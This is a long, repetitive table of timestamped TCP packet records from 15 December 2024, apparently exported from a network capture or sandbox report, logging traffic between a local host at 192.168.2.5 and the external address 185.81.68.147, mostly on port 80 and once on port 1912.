                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.426486015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.427438974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.427556038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.427614927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.428630114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.428649902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.428940058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.429694891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.429776907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.429836988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.430907965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.430994034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.431051016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.432071924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.432204008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.432318926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.433151007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.433455944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.433538914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.434324980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.434493065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.434557915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.435472012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.435643911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.435709953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.436645985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.436944962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.437006950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.437808037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.437911034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.437973976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.438986063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.439241886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.439307928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.440120935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.440224886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.440284967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.441294909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.441364050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.441426992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.442487001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.442580938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.442636967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.443588018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.443705082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.443767071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.444900990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.445041895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.445101023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.445936918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.446063042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.446125031 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.447189093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.447324038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.447386980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.448224068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.448388100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.448440075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.449450970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.449533939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.449757099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.450597048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.450669050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.450803041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.451818943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.451931953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.452172041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.452967882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.453140020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.453197956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.454125881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.454200029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.454255104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.455344915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.455399036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.455568075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.456377983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.456582069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.456641912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.457583904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.457690954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.457784891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.458741903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.458874941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.458929062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.459907055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.460006952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.460146904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.461013079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.461128950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.461185932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.462173939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.462404013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.462462902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.463375092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.463512897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.463573933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.464507103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.464587927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.464667082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.465712070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.465764999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.465856075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.466919899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.466976881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.467041969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.468071938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.468101978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.468163013 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.469202042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.469305038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.469360113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.470374107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.470462084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.470521927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.471591949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.471606970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.471677065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.472630978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.472781897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.472847939 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.473798037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.473908901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.473974943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.474931002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.475056887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.475289106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.476157904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.476249933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.476310968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.477262974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.477341890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.477395058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.478566885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.478739977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.478799105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.479572058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.520636082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.585683107 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.610944986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.611054897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.611123085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.611377001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.611526966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.611587048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.612569094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.612602949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.612659931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.613853931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.613874912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.613930941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.614940882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.615009069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.615065098 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.616096020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.616178036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.616270065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.617183924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.617326975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.617454052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.618422031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.618479967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.618534088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.619537115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.619621992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.619684935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.620688915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.620832920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.620889902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.621931076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.621948004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.622006893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.623110056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.623229027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.623297930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.624305010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.624325991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.624392986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.625395060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.625416994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.625468016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.626590014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.626610041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.626672983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.627691984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.627990961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.628047943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.628880978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.628978014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.629048109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.629961014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.630242109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.630314112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.631304979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.631397963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.631463051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.632258892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.632354975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.632411003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.633447886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.633538008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.633713961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.634708881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.634772062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.634834051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.635751963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.635911942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.636008978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.636992931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.637069941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.637130976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.638163090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.638183117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.638242006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.639343977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.639394045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.639451981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.640497923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.640568018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.640641928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.641633987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.641722918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.641835928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.642787933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.642993927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.643060923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.644026995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.644092083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.644191027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.645123005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.645143032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.645342112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.646272898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.646429062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.646553993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.647542000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.647562027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.647627115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.648565054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.648706913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.648767948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.649849892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.649866104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.649939060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.650959015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.650978088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.651067972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.652153969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.652173996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.652239084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.653254032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.653390884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.653434992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.654359102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.654501915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.654572964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.655520916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.655762911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.656728983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.656743050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.656781912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.656814098 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.657849073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.658015013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.658113003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.659127951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.659204006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.659651041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.660192966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.660737038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.660798073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.661328077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.661554098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.661618948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.662486076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.662600040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.662724972 CET4970880192.168.2.5185.81.68.147
